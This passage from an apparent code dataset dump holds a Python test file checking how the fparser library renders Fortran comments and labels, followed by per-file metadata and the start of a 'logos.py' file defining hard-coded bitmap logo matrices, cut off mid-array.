# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
# DAMAGE.
from fparser.api import parse
def test_comment_lines():
    """Parse free-form source with comments kept, and verify both the
    free-form and the fixed-form renderings line by line."""

    def body_lines(text):
        # The first rendered line embeds a transient memory address,
        # so drop it and compare everything after it.
        return text.strip().split('\n')[1:]

    source_str = '''\
!comment line 1
!comment line 2
module foo
!comment line 3
subroutine f
!comment line 4
end subroutine f !comment line 5
end module foo
'''
    tree = parse(source_str, isfree=True, isstrict=False,
                 ignore_comments=False)
    expected_free = '''
!BEGINSOURCE <cStringIO.StringI object at 0x1518de0> mode=free90
!comment line 1
!comment line 2
MODULE foo
!comment line 3
SUBROUTINE f()
!comment line 4
END SUBROUTINE f
!comment line 5
END MODULE foo
'''
    assert body_lines(str(tree)) == body_lines(expected_free)
    expected_fixed = '''
C BEGINSOURCE <cStringIO.StringI object at 0x1630de0> mode=free90
C comment line 1
C comment line 2
MODULE foo
C comment line 3
SUBROUTINE f()
C comment line 4
END SUBROUTINE f
C comment line 5
END MODULE foo
'''
    assert body_lines(tree.asfix()) == body_lines(expected_fixed)
def test_labels():
    """Verify statement labels, construct names, and labelled continuation
    lines in both free-form and fixed-form parsing."""

    def body_lines(text):
        # The first rendered line embeds a transient memory address,
        # so drop it and compare everything after it.
        return text.strip().split('\n')[1:]

    free_source = '''\
subroutine foo
real a
! Valid code:
100 a = 3
l: do
end do l
200 &! haa
a=4
300 l1: do
end do l1
end subroutine foo
'''
    tree = parse(free_source, isfree=True, isstrict=False,
                 ignore_comments=False)
    expected_free = '''
!BEGINSOURCE <cStringIO.StringI object at 0x2952e70> mode=free90
SUBROUTINE foo()
REAL a
! Valid code:
100 a = 3
l: DO
END DO l
200 a = 4
! haa
300 l1: DO
END DO l1
END SUBROUTINE foo
'''
    assert body_lines(str(tree)) == body_lines(expected_free)

    fixed_source = '''\
subroutine foo
real a
! Valid code:
100 a = 3
l: do
end do l
200 ! haa
&a=4
300 l1: do
end do l1
end subroutine foo
'''
    tree = parse(fixed_source, isfree=False, isstrict=False,
                 ignore_comments=False)
    expected_fixed = '''
! BEGINSOURCE <cStringIO.StringI object at 0x1d3b390> mode=fix90
SUBROUTINE foo()
REAL a
! Valid code:
100 a = 3
l: DO
END DO l
200 a = 4
! haa
300 l1: DO
END DO l1
END SUBROUTINE foo
'''
    assert body_lines(str(tree)) == body_lines(expected_fixed)
| 32.847953
| 77
| 0.692541
| 798
| 5,617
| 4.859649
| 0.24812
| 0.042548
| 0.022692
| 0.024755
| 0.883187
| 0.852501
| 0.845797
| 0.845797
| 0.845797
| 0.845797
| 0
| 0.029594
| 0.223963
| 5,617
| 170
| 78
| 33.041176
| 0.86006
| 0.582517
| 0
| 0.762887
| 0
| 0
| 0.647033
| 0
| 0
| 0
| 0.015707
| 0
| 0.041237
| 1
| 0.020619
| false
| 0
| 0.010309
| 0
| 0.030928
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b0e74a656fd4aead33af652be0d33758e1925620
| 40,248
|
py
|
Python
|
logos.py
|
sakurakhadag/escp2-client
|
f8d58bdaedc4f7ca811769538586b759c37eb355
|
[
"MIT"
] | null | null | null |
logos.py
|
sakurakhadag/escp2-client
|
f8d58bdaedc4f7ca811769538586b759c37eb355
|
[
"MIT"
] | 5
|
2019-10-10T13:53:48.000Z
|
2019-10-16T19:09:28.000Z
|
logos.py
|
sakurakhadag/escp2-client
|
f8d58bdaedc4f7ca811769538586b759c37eb355
|
[
"MIT"
] | 2
|
2019-10-11T17:56:31.000Z
|
2021-01-15T11:33:58.000Z
|
def loadlogo(logo=1):
    """Return a hard-coded monochrome logo bitmap.

    Parameters:
        logo: which bitmap to return.  1 gives a 26x26 matrix; 2 gives a
            67-row matrix (26 columns) whose first 26 rows equal logo 1.

    Returns:
        list[list[int]]: rows of 0/1 pixel values, each row 26 entries wide.

    Raises:
        ValueError: if `logo` is neither 1 nor 2.  (Previously an unknown id
            left `matrix` unbound and raised UnboundLocalError at `return`.)
    """
    if logo == 1:
        matrix = [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                  [0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
                  [0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
                  [0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
                  [0, 0, 0, 1, 1, 1, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
                  [0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                  [0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                  [0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                  [0, 0, 1, 1, 0, 0, 1, 1, 1, 1, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                  [0, 0, 1, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                  [0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0],
                  [0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0],
                  [1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0]]
    elif logo == 2:
        matrix = [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                  [0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
                  [0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
                  [0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
                  [0, 0, 0, 1, 1, 1, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
                  [0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                  [0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                  [0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                  [0, 0, 1, 1, 0, 0, 1, 1, 1, 1, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                  [0, 0, 1, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                  [0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0],
                  [0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0],
                  [1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 0, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 1, 1, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 1, 1, 1, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1],
                  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0]]
    else:
        # Fail loudly on unknown ids instead of leaving `matrix` unbound.
        raise ValueError("unknown logo id: %r (expected 1 or 2)" % (logo,))
    return matrix
def load_logo_fast():
a = [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 1, 1, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0, 1],
